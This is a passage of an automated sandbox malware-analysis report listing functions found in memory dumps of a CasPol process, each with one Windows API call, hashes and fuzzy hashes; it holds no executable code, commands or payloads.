                                  • String ID:
                                  • API String ID: 38366605-0
                                  • Opcode ID: a95a82913210ddfdbf296e6edb20d7a3cd13c988f3d59256ab77324ffdd12146
                                  • Instruction ID: be6e72cb0b4a7206312c480cb79615cf5477c0cd2cd4c4125182da50eee25926
                                  • Opcode Fuzzy Hash: a95a82913210ddfdbf296e6edb20d7a3cd13c988f3d59256ab77324ffdd12146
                                  • Instruction Fuzzy Hash: 1121D171904340AFE721DF55DD45F6AFBE4EF08310F0484AEED858A252D3B2A508CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E4BD2 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                  Download Yara Rule
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 010E4C4E
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: 976b892528d5f0de9a10acfb3be51c3e07fa25f68309b6ee125bc3dd53059c69
                                  • Instruction ID: 35ef812bc706fecc3fde389de54ec28d0a64a292265bca8413c1f925feb1f31e
                                  • Opcode Fuzzy Hash: 976b892528d5f0de9a10acfb3be51c3e07fa25f68309b6ee125bc3dd53059c69
                                  • Instruction Fuzzy Hash: 0E21AF724097809FDB228F61DC44B52FFF4EF0A320F0984DAE9848F163D275A419DB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E1402 Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: FileView
                                  • String ID:
                                  • API String ID: 3314676101-0
                                  • Opcode ID: a57cdaa571a0dd8fc118c9e0a3b16bfac2d61b4f03bc0eaa2feee92283ce7d76
                                  • Instruction ID: f6bf208308ab9f5a2c3ec894e63ddd4f4d2f645bc9f0d147629fa5d79053fb99
                                  • Opcode Fuzzy Hash: a57cdaa571a0dd8fc118c9e0a3b16bfac2d61b4f03bc0eaa2feee92283ce7d76
                                  • Instruction Fuzzy Hash: FC21F3B1904700AFF721CF15DC85F66FBE8EF08210F04855EE9858B241D775E508CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1D5FA873 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                  Download Yara Rule
                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 1D5FA8E2
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: 38965c458758873f7ef0d06392c386be09be2c311e5f5015fe8d3ae58a8e1069
                                  • Instruction ID: 8f3a1b66b2165c911dd61e5563e66bfc247b4106b0f894af22f9a985f3e70d7f
                                  • Opcode Fuzzy Hash: 38965c458758873f7ef0d06392c386be09be2c311e5f5015fe8d3ae58a8e1069
                                  • Instruction Fuzzy Hash: 482142725093805FD712CF25DC54B63BFE8EF46620F0988AAED89DF252D265E804DB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1D5FB58E Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                  Download Yara Rule
                                  APIs
                                  • MkParseDisplayName.OLE32(?,00000EA4,?,?), ref: 1D5FB612
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: DisplayNameParse
                                  • String ID:
                                  • API String ID: 3580041360-0
                                  • Opcode ID: 29a0d6f7c10001661a6376ddcf508b28f63b7d31e7911c2741ae8c3581b050eb
                                  • Instruction ID: 52c29f0ab9bc699eac5f732edf7eee7d9ff9dd481c663bb3517f4a26c2b5f004
                                  • Opcode Fuzzy Hash: 29a0d6f7c10001661a6376ddcf508b28f63b7d31e7911c2741ae8c3581b050eb
                                  • Instruction Fuzzy Hash: E011D6725053806FD3118B25DC41F72BFB8EF86620F19819AFD488B682D275B919C7B6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E1DD6 Relevance: 1.6, APIs: 1, Instructions: 66registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenCurrentUser.KERNEL32(?,00000EA4), ref: 010E1E39
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: CurrentOpenUser
                                  • String ID:
                                  • API String ID: 1571386571-0
                                  • Opcode ID: 25a8363f429dd9217aba0ae883bef661d5b77eaef752abe4df249ceb7f82a364
                                  • Instruction ID: 7894a3d9b2cf580568e7c9cb7fad09edeee6103e0e3c8b4def491354e841c4cb
                                  • Opcode Fuzzy Hash: 25a8363f429dd9217aba0ae883bef661d5b77eaef752abe4df249ceb7f82a364
                                  • Instruction Fuzzy Hash: 9811B2B1900304AFF7219B25DD89F6AFBECEF44720F18849AFD849F242D675A5058BB1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E1FDA Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegNotifyChangeKeyValue.KERNEL32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E2044
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: ChangeNotifyValue
                                  • String ID:
                                  • API String ID: 3933585183-0
                                  • Opcode ID: 3ff963e7e4c4f233db73b44d655dbcb3fe42b0086c00037952c55845c6745870
                                  • Instruction ID: 3070fa1a9988816627192280ecbcc8031be44b9971adcfbfb6d31eade7adbfa1
                                  • Opcode Fuzzy Hash: 3ff963e7e4c4f233db73b44d655dbcb3fe42b0086c00037952c55845c6745870
                                  • Instruction Fuzzy Hash: 9A11B172800704AFEB21CF55DC84FABFBECEF44210F14855AE9859B142D675A505CBB1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E1066 Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegQueryValueExW.KERNEL32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E10D8
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: c62d57ec5d76b93a27bfdfa631978ae2865a8ac23f06cc0ed7c0bc4479acbca6
                                  • Instruction ID: b0de7f2705016ce7d74df531f72e82eed5c17388991593b9301c85a0ff1b6d2b
                                  • Opcode Fuzzy Hash: c62d57ec5d76b93a27bfdfa631978ae2865a8ac23f06cc0ed7c0bc4479acbca6
                                  • Instruction Fuzzy Hash: 1011B172A00740AFE721CF16DC84F66FBE8EF08610F08859AE9858B251D6B4E405CB72
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E187E Relevance: 1.6, APIs: 1, Instructions: 64timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessTimes.KERNEL32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E18DD
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: ProcessTimes
                                  • String ID:
                                  • API String ID: 1995159646-0
                                  • Opcode ID: e2b0cff4c19ea261fea2be4ce247c5a569c4f04873784207a09661b2449304ee
                                  • Instruction ID: 1ba73f1c0be1bef1981afb900e15f2ad955b52d58674638bc3d6815adb9a7e29
                                  • Opcode Fuzzy Hash: e2b0cff4c19ea261fea2be4ce247c5a569c4f04873784207a09661b2449304ee
                                  • Instruction Fuzzy Hash: EC11E272900700AFEB21CF16EC85F6AFBE8EF44320F14846AED859B251D675A405CBB2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1D5FAD2A Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                  Download Yara Rule
                                  APIs
                                  • K32EnumProcessModules.KERNEL32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 1D5FAD86
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: EnumModulesProcess
                                  • String ID:
                                  • API String ID: 1082081703-0
                                  • Opcode ID: fd34ce3a5e5deba24ad7ae51f07b9d4314b364a4cf47726eeb1bc2e3f038b01b
                                  • Instruction ID: 14f2759b2783b907592253216b1d5f2c9491d509d7be6c5e13a38fd81d1d31b6
                                  • Opcode Fuzzy Hash: fd34ce3a5e5deba24ad7ae51f07b9d4314b364a4cf47726eeb1bc2e3f038b01b
                                  • Instruction Fuzzy Hash: 0811EF72900740AFE721CF25DC85F67FBA8EF44620F18886AED48CF241D675A8058BB2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E378E Relevance: 1.6, APIs: 1, Instructions: 63encryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CertVerifyCertificateChainPolicy.CRYPT32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E37EA
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: CertCertificateChainPolicyVerify
                                  • String ID:
                                  • API String ID: 3930008701-0
                                  • Opcode ID: 2fc057ae7ba15bb4037799f88e2b6d7b5eb9107f478a3d43a0310501d96fecc6
                                  • Instruction ID: efff72a457fdac73aadc2ed567f9efac8ef7c4c7f24e12328235672edd49c9d5
                                  • Opcode Fuzzy Hash: 2fc057ae7ba15bb4037799f88e2b6d7b5eb9107f478a3d43a0310501d96fecc6
                                  • Instruction Fuzzy Hash: 3311E271904700AFFB218F26DD85F6AFBE8EF44220F1884AAED858F241D675A405CB72
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E1C26 Relevance: 1.6, APIs: 1, Instructions: 63networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • WSAEventSelect.WS2_32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E1C8A
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: EventSelect
                                  • String ID:
                                  • API String ID: 31538577-0
                                  • Opcode ID: 9487a5f52a835dabdd341b4a3a6ddea295168b588c9cc0c12288630c17b0d8e2
                                  • Instruction ID: d48f0f8a95fd08e0524a0c534f3427cb37d61dfa1e67625917b84c44be99647c
                                  • Opcode Fuzzy Hash: 9487a5f52a835dabdd341b4a3a6ddea295168b588c9cc0c12288630c17b0d8e2
                                  • Instruction Fuzzy Hash: C411B2B2800304AFE721CB55DD84FAAF7ECEF44220F14846AED49DB241D674A505CBB2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E4996 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                  Download Yara Rule
                                  APIs
                                  • getsockname.WS2_32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E49F7
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: getsockname
                                  • String ID:
                                  • API String ID: 3358416759-0
                                  • Opcode ID: 7058b42fe0eca01df16e01b886dc133de3407aaa68075e93736b8d71c9d99e01
                                  • Instruction ID: 6353b25192ff4847f1dbc292391a5b4f978a2aa04fcd9a664d063d15422080e8
                                  • Opcode Fuzzy Hash: 7058b42fe0eca01df16e01b886dc133de3407aaa68075e93736b8d71c9d99e01
                                  • Instruction Fuzzy Hash: CA11B271904300AFE721CF16DC89F6AF7E8EF44620F1884A6ED45DB242D674A405CBB5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1D5FAFDA Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetExitCodeProcess.KERNEL32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 1D5FB030
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: CodeExitProcess
                                  • String ID:
                                  • API String ID: 3861947596-0
                                  • Opcode ID: 51d84bd59181f96bf9df77cb8fdeb69ff4f2814521d8eaedbd153aa5c9c7286b
                                  • Instruction ID: 9df3434f6a1f4f4cb8553fcd28e629877e93fb5ac0f1259ea7d247765c2f0fec
                                  • Opcode Fuzzy Hash: 51d84bd59181f96bf9df77cb8fdeb69ff4f2814521d8eaedbd153aa5c9c7286b
                                  • Instruction Fuzzy Hash: 2611E371904200EFF721CB15DC85B66FBACEF44620F14C86AED08DF241D679A8058BB2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1D5FA48A Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetErrorMode.KERNEL32(?,C151FFB0,00000000,?,?,?,?,?,?,?,?,73343C68), ref: 1D5FA4E8
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: d4ae071d50b9f10e309e871664209692f63e7955fb3c049f7276bb2414947539
                                  • Instruction ID: 239624f4005ca702e028a428ab33b4a5680895ddd266bf644ee075e606cb9f05
                                  • Opcode Fuzzy Hash: d4ae071d50b9f10e309e871664209692f63e7955fb3c049f7276bb2414947539
                                  • Instruction Fuzzy Hash: 58112C7140E3C06FD7138B259C94662BFB49F47220F0984DBDD858F1A3D2696809CB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E0AD2 Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ReadFile.KERNEL32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E0B31
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: FileRead
                                  • String ID:
                                  • API String ID: 2738559852-0
                                  • Opcode ID: 38317e764950e139da653e42e49a6e1b369693729487055d7d179aca2e59d334
                                  • Instruction ID: 401a992eebd190bc3b71b4f195b30634fa83ba9fa471c16e34ad86c1bc53d7a1
                                  • Opcode Fuzzy Hash: 38317e764950e139da653e42e49a6e1b369693729487055d7d179aca2e59d334
                                  • Instruction Fuzzy Hash: AB110471900700AFEB21CF15DC84F66FBE8EF44310F14845AED849B152C2B5A405CBB2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E3876 Relevance: 1.6, APIs: 1, Instructions: 59encryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CertVerifyCertificateChainPolicy.CRYPT32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E38D2
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: CertCertificateChainPolicyVerify
                                  • String ID:
                                  • API String ID: 3930008701-0
                                  • Opcode ID: ed2f6908efc1b49986931da5f8f2580272616e1f9702b244f6777437e9ecb496
                                  • Instruction ID: 47fdc3e20a687b0de70fb13fbc6079469a28605621c43150ec304fd1e4544799
                                  • Opcode Fuzzy Hash: ed2f6908efc1b49986931da5f8f2580272616e1f9702b244f6777437e9ecb496
                                  • Instruction Fuzzy Hash: 6511E371900700AFEB21CF16DD88F66FBE8EF44320F18849AED849F241D275A405CB72
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E196A Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                  Download Yara Rule
                                  APIs
                                  • ioctlsocket.WS2_32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E19C3
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: ioctlsocket
                                  • String ID:
                                  • API String ID: 3577187118-0
                                  • Opcode ID: 9b33770ae0412f20e990cd93546268c93a3ab3497b27ff39c3e4d0d4e7183bbb
                                  • Instruction ID: 6ff355c1f8c964b3fd8815a3beeae4f41d43b9b218aa110dabf619b410a36872
                                  • Opcode Fuzzy Hash: 9b33770ae0412f20e990cd93546268c93a3ab3497b27ff39c3e4d0d4e7183bbb
                                  • Instruction Fuzzy Hash: D811C671904740AFE721CF15DC85FA6FBE8EF44324F18849AED499F241D675A405CBB2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E4816 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                  Download Yara Rule
                                  APIs
                                  • GlobalMemoryStatusEx.KERNEL32(?,C151FFB0,00000000,?,?,?,?,?,?,?,?,73343C68), ref: 010E4874
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: GlobalMemoryStatus
                                  • String ID:
                                  • API String ID: 1890195054-0
                                  • Opcode ID: da9a1b68f629d7768e0ad33c731a99ac7142d6039045a1ac4833685d4246239b
                                  • Instruction ID: 5f8f5d21e4e7a6811ca2f22237981bbf2f606dc2ef5625eb8238ad5fa002f102
                                  • Opcode Fuzzy Hash: da9a1b68f629d7768e0ad33c731a99ac7142d6039045a1ac4833685d4246239b
                                  • Instruction Fuzzy Hash: E5118E715093809FD7128B65DC85B56BFE4EF46220F0884EAED85CF263C275A808CB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1D5FB093 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualAllocExNuma.KERNEL32(?,?,?,?,?,?,C151FFB0,00000000,?,?,?,?), ref: 1D5FB0F7
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: AllocNumaVirtual
                                  • String ID:
                                  • API String ID: 4233825816-0
                                  • Opcode ID: a53d9319fb36b8a9440595f24c41399442a6f2a46a144e45eba798c1650940d5
                                  • Instruction ID: 496cfcd6a1fb62817eade6bb0d56b7a491ae3d8393fc42c7225cffb5c8fb03aa
                                  • Opcode Fuzzy Hash: a53d9319fb36b8a9440595f24c41399442a6f2a46a144e45eba798c1650940d5
                                  • Instruction Fuzzy Hash: 7411D671408380AFDB228F11DC44B52FFB4EF46210F08859AED858F153C375A418DB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E17AE Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                  Download Yara Rule
                                  APIs
                                  • shutdown.WS2_32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E1804
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: shutdown
                                  • String ID:
                                  • API String ID: 2510479042-0
                                  • Opcode ID: 2eb8c631918af0e66dd098e52594eb847947f08cce0f5c600fd5a2665bbf05cc
                                  • Instruction ID: 6684adefc0171f40f88923da2b32820cb2fd9b19826885e1d8e6f7ee02a5b388
                                  • Opcode Fuzzy Hash: 2eb8c631918af0e66dd098e52594eb847947f08cce0f5c600fd5a2665bbf05cc
                                  • Instruction Fuzzy Hash: 5D11C271904300AFEB21CF15DD89B6AFBE8EF44620F1884A6ED449F242D679A405CBB2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1D5FB70C Relevance: 1.6, APIs: 1, Instructions: 56comCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: Initialize
                                  • String ID:
                                  • API String ID: 2538663250-0
                                  • Opcode ID: 553c0c9a05c941eeb202c1e82f1340cb55c5046a55286d54d1904ddc563dad28
                                  • Instruction ID: 71ec630b1f87c41d72f2dac35e6d7294f7c7cc3328db13a2cec1b9ccde1144d3
                                  • Opcode Fuzzy Hash: 553c0c9a05c941eeb202c1e82f1340cb55c5046a55286d54d1904ddc563dad28
                                  • Instruction Fuzzy Hash: 7F116D715093C0AFD7128F25DC98B92BFB4DF46220F0884DADCC88F253D275A808DBA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E4D46 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: FindWindow
                                  • String ID:
                                  • API String ID: 134000473-0
                                  • Opcode ID: a67a838f2945bd35b93f55f408029ca6f738c314aa06319bfebcf80779b9b7a9
                                  • Instruction ID: 7eb3660e7ccfd5e80f47d3e0dbac16b03eafc1de60957deafa06be75b427b126
                                  • Opcode Fuzzy Hash: a67a838f2945bd35b93f55f408029ca6f738c314aa06319bfebcf80779b9b7a9
                                  • Instruction Fuzzy Hash: 391142715083849FD752CB2ADC85B52FFE8EF46220F0980DAE985CF253D275E814CB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E01D6 Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNEL32(?,00000EA4), ref: 010E023F
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 12ec6384295e9a2a5e8d53d4313bebc72952c88bd29cec806aba4c74ed46d6a5
                                  • Instruction ID: 86f886f0e4ad28105076c48598a6b87ecdd9684537b6d7796c7bba6f94fcc496
                                  • Opcode Fuzzy Hash: 12ec6384295e9a2a5e8d53d4313bebc72952c88bd29cec806aba4c74ed46d6a5
                                  • Instruction Fuzzy Hash: AE112571A00300AFF7208B15DC85B76F7E8DF45720F18809AFD444A285D2B9A504CB66
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E29E6 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetAdaptersAddresses.IPHLPAPI(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E2A45
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: AdaptersAddresses
                                  • String ID:
                                  • API String ID: 2506852604-0
                                  • Opcode ID: 960dd83f6a346ec481b913dd20d84315b3ec1168c2b0d5fcf4069cfbe71edd28
                                  • Instruction ID: 4fc9735a24b19a4d2371c31f18f626e283a0a5447e0ddb0ada7040cf8697594a
                                  • Opcode Fuzzy Hash: 960dd83f6a346ec481b913dd20d84315b3ec1168c2b0d5fcf4069cfbe71edd28
                                  • Instruction Fuzzy Hash: E911C271900700AFEB31CF16DC85F6AFBE8EF45720F18859AED858B251D675A409CBB2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1D5FA078 Relevance: 1.6, APIs: 1, Instructions: 54networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: recv
                                  • String ID:
                                  • API String ID: 1507349165-0
                                  • Opcode ID: ac8f38e6b8bc14e8ab201af8e5b9711354b1a034b25a10c0bef8f9c390f541fc
                                  • Instruction ID: f4852b96910836efb1b8ba5648dcc34ab67c35deeeaccbabf1febe8aac083d3d
                                  • Opcode Fuzzy Hash: ac8f38e6b8bc14e8ab201af8e5b9711354b1a034b25a10c0bef8f9c390f541fc
                                  • Instruction Fuzzy Hash: AE118271409780AFD712CF15DC44F52FFB4EF46224F09C49AED888F152C275A418DB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E1D0A Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                  Download Yara Rule
                                  APIs
                                  • RasConnectionNotificationW.RASAPI32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E1D63
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: ConnectionNotification
                                  • String ID:
                                  • API String ID: 1402429939-0
                                  • Opcode ID: 41838af9e3adfad008f2b644fb6648e9a370c68c71e41b6f89968988ee140b40
                                  • Instruction ID: e09e20c287b19d60ee2c06cb4ce5efa901037e7a2003c76e47d7ca8f5a7aecc1
                                  • Opcode Fuzzy Hash: 41838af9e3adfad008f2b644fb6648e9a370c68c71e41b6f89968988ee140b40
                                  • Instruction Fuzzy Hash: 6E11E171904700AFFB21AB16DC85F66FBE8EF45320F18C09AED858B241D2B5A405CAB2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1D5FA89A Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                  Download Yara Rule
                                  APIs
